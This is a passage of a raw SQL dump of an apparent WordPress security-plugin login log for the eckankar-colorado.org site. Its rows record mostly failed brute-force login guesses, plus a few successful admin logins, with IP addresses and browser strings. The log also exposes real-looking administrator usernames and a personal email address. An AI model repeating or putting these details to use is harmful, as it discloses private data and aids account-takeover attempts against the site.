Edg/96.0.1054.62'),(18283,108036,1691141786.993459,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBB1031E6,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(18282,107959,1691119318.937837,1,'loginFailInvalidUsername','support2',0,0x00000000000000000000FFFFDFF4EB3A,'Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(20219,135047,1700584728.203034,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(20218,135045,1700584093.614248,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860DB37,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(20217,135044,1700583956.460372,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(18217,107592,1691078525.402934,1,'loginFailInvalidUsername','admin-5',0,0x00000000000000000000FFFF600998CA,'Mozilla/5.0 (iPad; CPU OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/194.0.419363360 Mobile/15E148 Safari/604.1'),(18244,107860,1691107339.394599,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF94FFDEB6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18245,107861,1691107342.004353,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF6E9F9B34,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18246,107862,1691107348.704578,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFB52BC576,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18247,107863,1691107396.805408,1,'loginFailInvalidUsername','Eckankar-colorado.org!',0,0x00000000000000000000FFFF71A0B820,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18248,107864,1691107442.727624,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFFB4F2E9C3,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18249,107865,1691107583.143941,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF296D399C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18250,107866,1691107584.099541,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF33FDF198,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18251,107867,1691107601.776770,1,'loginFailInvalidUsername','Password!',0,0x00000000000000000000FFFFC08C1F9A,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18252,107868,1691107730.202516,1,'loginFailInvalidUsername','Password',0,0x00000000000000000000FFFF67184B0E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18253,107869,1691107736.151872,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFF7B153042,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18254,107870,1691107763.356384,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFFBEEBC005,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18255,107871,1691107870.859833,1,'loginFailInvalidUsername','Eckankar-colorado!',0,0x00000000000000000000FFFF29E1A788,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18256,107881,1691113626.327902,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18257,107882,1691113627.123003,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18258,107883,1691113627.915775,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18259,107884,1691113628.709658,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18260,107885,1691113630.578410,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18261,107886,1691113631.399359,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18262,107887,1691113632.225413,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E63D9,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18398,109411,1691348448.372845,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFB06B6B78,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18399,109412,1691348451.382737,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFFC3881212,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18400,109413,1691348532.788452,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF9CCAA180,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18401,109414,1691348535.093315,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBB4A96BD,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18402,109415,1691348538.658243,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF053F4CDA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18403,109416,1691348576.428394,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFF0E631CFE,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18404,109417,1691348605.170460,1,'loginFailInvalidUsername','mail.eckankar-colorado.org',0,0x00000000000000000000FFFFC44B273A,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18218,107834,1691107004.948167,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB4F24564,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18219,107835,1691107006.558361,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF29F21201,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18220,107836,1691107021.725890,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB5428ACD,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18221,107837,1691107024.409262,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFF5588859C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18222,107838,1691107025.905119,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF31CC88B4,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18223,107839,1691107025.966966,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF245A3669,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18224,107840,1691107029.171081,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFFD93ECBAA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18225,107841,1691107036.841329,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFC4961DB5,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18226,107842,1691107047.679617,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF2A70BFA9,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18227,107843,1691107109.703314,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7B1410FC,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(20216,135033,1700557333.376380,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF8DA490D0,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(20215,135016,1700541610.014435,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB752A422,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(20214,135006,1700519446.478300,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB4FE496A,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(20213,134985,1700517466.365759,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14DB3EB7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(18242,107858,1691107286.199129,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC4CBF8E5,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(20191,134929,1700425271.245012,1,'loginFailInvalidUsername','reina',0,0x00000000000000000000FFFFB33C9378,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(18243,107859,1691107329.852754,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF6738B7DB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(20190,134926,1700423474.718907,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF18905108,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(18228,107844,1691107116.194107,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFF1B424E65,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18229,107845,1691107121.209076,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2425C2F7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18230,107846,1691107125.881579,1,'loginFailInvalidUsername','eckankar-colorado.org',0,0x00000000000000000000FFFF40771EA6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18231,107847,1691107140.658318,1,'loginFailInvalidUsername','password',0,0x00000000000000000000FFFF6E88C599,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18232,107848,1691107162.823155,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFB1F9AA48,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18233,107849,1691107169.129224,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF67AB9684,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18234,107850,1691107173.264517,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFB4F1F01D,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18235,107851,1691107178.290123,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF704E246A,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18236,107852,1691107181.252967,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF1B48ABD3,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18237,107853,1691107219.376574,1,'loginFailInvalidUsername','Admin',0,0x00000000000000000000FFFF5E36C009,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18238,107854,1691107224.714872,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67F70E7D,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18239,107855,1691107228.812196,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF7AA6929B,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18240,107856,1691107255.713956,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF699F5122,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18241,107857,1691107278.806606,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF1B4755D2,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18353,109366,1691348014.240498,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB4F4A5B6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18352,109362,1691340285.409097,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18354,109367,1691348016.474754,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF31F9BA9A,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18355,109368,1691348020.663411,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFFAAEE7CA2,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18356,109369,1691348037.765588,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFFBE950474,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18357,109370,1691348041.603250,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFB6FD9375,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18358,109371,1691348047.854173,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF59DAF316,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18359,109372,1691348059.469173,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFF0EE4B2A8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18360,109373,1691348062.486825,1,'loginFailInvalidUsername','Eckankar-colorado!',0,0x00000000000000000000FFFF7DA4031E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18361,109374,1691348064.541400,1,'loginFailInvalidUsername','Mail!',0,0x00000000000000000000FFFF7B1381B7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18362,109375,1691348069.325923,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF74003ABA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18363,109376,1691348069.493210,1,'loginFailInvalidUsername','Mail',0,0x00000000000000000000FFFFC441EB69,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18364,109377,1691348073.139088,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF1B481E2E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18365,109378,1691348075.779917,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF57D4C501,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18366,109379,1691348088.620966,1,'loginFailInvalidUsername','mail',0,0x00000000000000000000FFFFBE56875B,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18367,109380,1691348089.675804,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFF24440843,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18368,109381,1691348091.568313,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFBF093F69,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18369,109382,1691348110.737222,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFB55ED316,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18370,109383,1691348111.022627,1,'loginFailInvalidUsername','Admin',0,0x00000000000000000000FFFFB75273EE,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18371,109384,1691348111.369343,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF67891966,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18372,109385,1691348122.856108,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7A030717,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18373,109386,1691348141.412738,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD5953EB1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18374,109387,1691348142.601596,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67E10DF3,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18375,109388,1691348148.320203,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCA53A2BA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18376,109389,1691348153.443744,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFFC5F89A8E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18318,108540,1691254504.049237,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF28560AA1,'Mozilla/5.0'),(18319,108573,1691263210.903421,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD59A1776,'Mozilla/5.0 (Linux; Android 12; SM-F926U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18320,108574,1691263217.112585,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF9ACF5228,'Mozilla/5.0 (Linux; Android 10; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18321,108575,1691263219.565590,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFF67A2C447,'Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18322,108576,1691263222.136479,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFF783928EE,'Mozilla/5.0 (Linux; Android 8.0.0; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36'),(18323,108577,1691263227.232336,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF2E14C37F,'Mozilla/5.0 (Linux; Android 11; SM-A516U Build/RP1A.200720.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.104 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/342.1.0.14.119;]'),(18324,108578,1691263230.189102,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFFC4036028,'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18325,108579,1691263489.433482,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFFA5496DA0,'Mozilla/5.0 (Linux; Android 12; SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18326,108580,1691263493.649973,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFF557AB4AA,'Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.104 Mobile DuckDuckGo/5 Safari/537.36'),(18327,108581,1691263496.949185,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFF3DF6269A,'Mozilla/5.0 (Linux; Android 11; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18328,108582,1691263499.780561,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFFCBB0878A,'Mozilla/5.0 (Linux; Android 9; LM-G710VM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.82 Mobile Safari/537.36'),(18329,108583,1691263502.572205,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFF705E6100,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/97.0.4692.72 Mobile/15E148 Safari/604.1'),(18330,108584,1691263505.290626,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFF245D3A02,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18331,109039,1691303674.742658,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF65FFA5B6,'Mozilla/5.0 (Linux; Android 11; SM-F916U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18301,108075,1691170157.559501,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18332,109040,1691303680.825564,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFFB992D7C9,'Mozilla/5.0 (Linux; Android 10; moto g(7) optimo (XT1952DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18302,108475,1691195105.072548,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF4AF99ABB,'Mozilla/5.0'),(18303,108516,1691240274.390954,1,'loginFailInvalidUsername','choll.03@comcast.net',0,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18304,108517,1691240296.241732,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18305,108518,1691240502.952920,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18306,108519,1691240897.973818,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFF9A9FF701,'Mozilla/5.0 (Linux; Android 12; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18307,108520,1691240901.976686,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFF8E2CF4FC,'Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18308,108521,1691240904.230929,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFF60095071,'Mozilla/5.0 (Linux; Android 11; SM-G981W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18309,108522,1691240906.704133,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFFA5496DA0,'Mozilla/5.0 (Linux; Android 8.1.0; SM-N960U1 Build/M1AJQ; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 Mobile Safari/537.36'),(18310,108523,1691240909.247707,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFF674F083A,'Mozilla/5.0 (iPad; CPU OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1'),(18311,108524,1691240914.715576,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFF40771DEC,'Mozilla/5.0 (iPad; CPU OS 12_1 like Mac OS X) 